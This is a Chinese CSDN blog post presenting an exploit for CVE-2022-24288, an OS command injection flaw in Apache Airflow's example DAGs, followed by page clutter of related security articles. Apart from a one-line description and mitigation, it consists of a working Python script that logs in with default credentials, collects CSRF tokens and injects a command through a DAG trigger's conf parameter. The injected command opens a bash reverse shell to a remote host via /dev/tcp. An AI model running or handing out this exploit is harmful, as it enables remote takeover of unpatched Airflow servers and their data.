CVE-2022-24288 Apache Airflow RCE POC/EXP

最新推荐文章于 2024-04-23 22:27:55 发布
最新推荐文章于 2024-04-23 22:27:55 发布
阅读量1k 收藏
点赞数 1
分类专栏: 漏洞库 文章标签: apache python 爬虫 安全 运维开发
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43080961/article/details/125152520
版权

一、描述

在 Apache Airflow 2.2.4 之前的版本中,一些示例 DAG 没有正确清理用户提供的参数,使其容易受到来自 Web UI 的 OS 命令注入的影响。

二、缓解:

这可以通过确保[core] load_examples设置为来缓解False

三、 EXP

(payload1 2是俩个不同利用点,选择用一个就行)

import requests
import re
import random

proxy = {
    "http": "http://127.0.0.1:8080",
    "https": "https://127.0.0.1:8080"
}

def dl(url, user, pwd):
    urls = url + '/login/?next=' + url + '/home'
    rep = requests.get(url)
    session = rep.headers['Set-Cookie'].split()[0].replace(';', '')
    csrf = re.findall(r"var csrfToken = '(.+?)'", rep.text)[0]
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
                      "Chrome/99.0.4844.84 Safari/537.36",
        "Cookie": session
    }
    data = {
        'csrf_token': csrf,
        'username': user,
        'password': pwd
    }
    reps = requests.post(urls, data=data, headers=headers)
    s1 = reps.headers['Set-Cookie'].split()[0].replace(';', '')
    c1 = re.findall(r"var csrfToken = '(.+?)'", reps.text)[0]
    return s1, c1


def payload1(urll, sess, csrf, cmd):
    urls = urll + '/trigger?dag_id=example_passing_params_via_test_command'
    code1 = random.randint(0, 60)
    dates = '2022-04-02 09:88:31+00:00'
    dates1 = dates.replace('88', str(code1))

    cmds = '{"foo":"\\";' + cmd + ';\\""}'
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36",
        "Accept": "text/html",
        "Cookie": sess,
    }
    print(dates1)

    data = {
        'csrf_token': csrf,
        'dag_id': 'example_passing_params_via_test_command',
        'origin': '/home',
        'execution_date': dates1,
        'conf': cmds,
        'unpause': 'on'
    }

    rep = requests.post(urls, data=data, headers=headers, proxies=proxy)
    print(rep.status_code)


def payload2(urll, sess, csrf, cmd):
    urls = urll + '/trigger?dag_id=tutorial'
    code1 = random.randint(0, 60)
    dates = '2022-04-02 09:88:31+00:00'
    dates1 = dates.replace('88', str(code1))

    cmds = '{"my_param":"\\";' + cmd + ';\\""}'
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36",
        "Accept": "text/html",
        "Cookie": sess,
    }
    print(dates1)

    data = {
        'csrf_token': csrf,
        'dag_id': 'tutorial',
        'origin': '/home',
        'execution_date': dates1,
        'conf': cmds,
        'unpause': 'on'
    }

    rep = requests.post(urls, data=data, headers=headers, proxies=proxy)
    print(rep.status_code)


if __name__ == '__main__':
    user = 'airflow'
    pwd = 'airflow'
    url = input("url __>:")
    #url = 'http://192.168.153.131:8080'
    cmd = 'bash -i >& /dev/tcp/192.168.153.131/9999 0>&1'
    s1, c1 = dl(url, user, pwd)
    print(f'Command __>: {cmd}')
    #payload1(url, s1, c1, cmd)
    payload2(url, s1, c1, cmd)

三鲜水饺子
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1<Apache spark 版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
应用安全系列之二十六:应用层DOS攻击
jimmyleeee的专栏
04-08 3874
DoS是Denial of Service的简称,即拒绝服务,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务。主要手段就是通过非正常方法消耗计算机的资源,包括:带宽、内存、CPU、文件、数据库连接等。 说到DOS攻击,可能很多人立刻就想到了各种协议级别的攻击,例如;TCP SYN FLOOD等,这里所说的DOS攻击不谈这些协议层的攻击,只谈论一些在应用曾因为某些编码或者设计错误而导致的DOS攻击。 应用层的可能导致DOS攻击的主要有:注入攻击、权限控制、资源耗尽、Serv
网络安全中的POCEXP、Payload、ShellCode_网络安全payload是什么意思
ZL_1618的博客
11-04 371
POC:概念证明,即概念验证(英语:Proof of concept,简称POC)是对某些想法的一个较短而不完整的实现,以证明其可行性,示范其原理,其目的是为了验证一些概念或理论。在计算机安全术语中,概念验证经常被用来作为0day、exploit的别名。EXP:利用(英语:Exploit,简称EXP)一般指可利用系统漏洞进行攻击的动作程序。Payload:中文 ’ 有效载荷 ',指成功exploit之后,攻击代码释放的具有攻击能力的能够实现攻击者目的的代码。
最新xray1.9.11高级版下载Windows/Linux
weixin_43167326的博客
12-28 1420
xray 是一款功能强大的安全评估工具,由多名经验丰富的一线安全从业者呕心打造而成,主要特性有: 检测速度快。发包速度快; 漏洞检测算法效率高。 支持范围广。大至 OWASP Top 10 通用漏洞检测,小至各种 CMS 框架 POC,均可以支持。 代码质量高。编写代码的人员素质高, 通过 Code Review、单元测试、集成测试等多层验证来提高代码可靠性。 高级可定制。通过配置文件暴露了引擎的各种参数,通过修改配置文件可以客制化功能。 安全无威胁。xray 定位为一款安全辅助评估工具,而不是攻击工具
xray1.9.4高级社区版下载
qq_49869351的博客
01-12 7036
xray因其方便的代理检测模式,高效率,易于使用,和多样的poc闻名于安全圈。就这23年初始,xray就更新了1.9.4版本。已经添加了许可证,进行了pj。供大家下载,并且内置了superxray图像化界面,非常方便。
HTB靶机-Lame-WP
灰蜗牛
04-25 852
简介:Tags:Rating: 4.4Skills:扫下IP: 1.ftp 匿名登录ftp查看一下 尝试vsftp对应的漏洞 该漏洞不存在,转向ssh和smb试着爆破一下,没发现可以利用的点。 不用MSF怎么解决呢?试试nmap的nse漏洞脚本,无果 非MSF 信息搜集,寻找历史漏洞确定Samba具体版本 关于smbclient出现NT_STATUS_CONNECTION_DISCONNECTED错误smbclient从4.11开始协议取消了nt1,使用smbv2,所以导致协议不能协商,解决办法如上,通过
Apache Airflow OS命令注入(CVE-2022-24288
xiaobai_20190815的博客
05-17 1118
一、漏洞描述 Apache Airflow是美国阿帕奇(Apache)基金会的一套用于创建、管理和监控工作流程的开源平台。该平台具有可扩展和动态监控等特点。 Apache Airflow 存在操作系统命令注入漏洞,该漏洞的存在是由于某些示例dag中不正确的输入验证。远程未经身份验证的攻击者可利用该漏洞可以传递专门制作的HTTP请求,并在目标系统上执行任意操作系统命令。该漏洞允许远程攻击者可利用该漏洞在目标系统上执行任意shell命令。 二、影响版本 Apache Airflow <2.2.4
如何寻找PoC-Exp资源,打造自己的渗透测试军火库?
janlzk的专栏
11-01 3356
<font size=14 color=blue>转自:原链接</font> 拼客学院陈鑫杰:如何寻找PoC-Exp资源,打造自己的渗透测试军火库? 有同学询问陈老师: 作为一名白帽子黑客,我们应该去哪里找这些PoC/Exp资源,用于渗透测试工作,打造自己的网络安全军火库。 对于白帽子黑客而言,PoC/Exp 资源就好比我们的弹药,通过各种各样的渠道能获取更多的 PoC/Exp,就意味着我们的军火库能够配备得更豪华,在攻防世界里这便代表着更大胜率。 ...
POCEXP脚本
weixin_45007073的博客
01-25 7526
引言 在我们的日常渗透测试中,经常挖掘到一些漏洞,但是我们一般使用挖掘工具或者手工判断的时候,不好确定是不是真的存在这么一个漏洞,因此POC脚本就应运而生了。POC全称是Proof of Concept,中文译作概念验证。它是专门为了验证漏洞是否真的存在的脚本。而EXP全称是Exploit,中文译作漏洞利用程序。它是对POC验证结果的一种漏洞利用脚本。 编程基础 因为市面上有关POCEXP脚本的教程比较稀少,但是比较明确的是想要写好POCEXP,一般都要有一些网络编程的基础,python的要会基本的爬虫
CVE-2020-0796复现(poc+exp
1stPeak's Blog
07-14 1415
一、介绍 Microsoft服务器消息块3.1.1(SMBv3)协议处理某些请求的方式中存在一个远程代码执行漏洞,也就是"Windows SMBv3客户端/服务器远程代码执行漏洞"。 二、影响版本 Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows Server, Vers
安全】漏洞名词扫盲(POCEXPCVE,CVSS等)
热门推荐
qqchaozai的专栏
12-16 1万+
POC(Proof of Concept) 漏洞证明,漏洞报告中,通过一段描述或一个样例来证明漏洞确实存在 EXPExploit) 漏洞利用,某个漏洞存在EXP,意思就是该漏洞存在公开的利用方式(比如一个脚本) 0DAY 含义是刚刚被发现,还没有被公开的漏洞,也没有相应的补丁程序,威胁极大。 CVE(Common Vulnerabilities & Exposures) 公共漏洞和...
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而...
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2022-37969 Windows 本地权限提升 PoC
08-23
CVE-2022-37969 是通用日志文件系统驱动 clfs 中的越界写入漏洞,通过该漏洞,可以完成提权。 // // Understanding the CVE-2022-37969 Windows Common Log File System Driver Local Privilege Escalation.  // ...
深入理解Java消息中间件-Apache Kafka
u011532237的博客
04-21 1417
Apache Kafka是一个开源的分布式事件流平台,由LinkedIn创建,并于2011年贡献给了Apache软件基金会。它设计用来高效处理实时数据流和大数据,通过发布-订阅的消息系统提供高吞吐量、持久存储、流数据处理等功能。
Apache Answer 开源问答社区安装体验
人人都懂物联网
04-20 1237
是由 SegmentFault 思否团队打造的一款问答平台软件,后端使用 Go 语言编写,于2022年10月24日(程序员节)正式开源。你可以免费使用 Answer 高效地搭建一个问答社区,并用于产品技术问答、客户支持、用户交流等场景。2023年10月9日,Answer 顺利通过投票,以全票通过的优秀表现正式进入 Apache 软件基金会(ASF)孵化器。10月18日,Answer 项目正式移交到 Apache 软件基金会名下,从此改名为 Apache Answer。
web server apache tomcat11-16-mbean
04-23 346
整理这个官方翻译的系列,原因是网上大部分的 tomcat 版本比较旧,此版本为 v11 最新的版本。Tomcat 使用 JMX MBeans 技术来实现对 Tomcat 的可管理性。Catalina 的 JMX MBeans 描述在每个包中的 mbeans-descriptors.xml 文件中。您需要为自定义组件添加 MBean 描述,以避免出现 "ManagedBean is not found" 异常。
《HCIP-openEuler实验指导手册》1.4 Apache MPM工作模式调整
最新发布
xzzteach的博客
04-23 496
查看MPM当前工作模式方法一:方法二:浏览器访问:http://IP:端口/server-status查看是否开启(是否注释)修改MPM工作模式。
CVE-2022-41741, CVE-2022-41742
08-02
CVE-2022-41741和CVE-2022-41742是影响NGINX Plus、NGINX开源版以及NGINX企阅版的漏洞。CVE-2022-41741是一个内存损坏漏洞,CVSS评分为7.1(高危),而CVE-2022-41742是一个内存泄漏漏洞,CVSS评分为7.0(高危)。[1]为了修复这些漏洞,NGINX发布了稳定版nginx-1.22.1和主线版nginx-1.23.2,并包含了针对ngx_http_mp4_module中内存损坏和内存泄漏的修复补丁。[3]这些修复补丁可以帮助防止攻击者利用这些漏洞对系统造成损害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值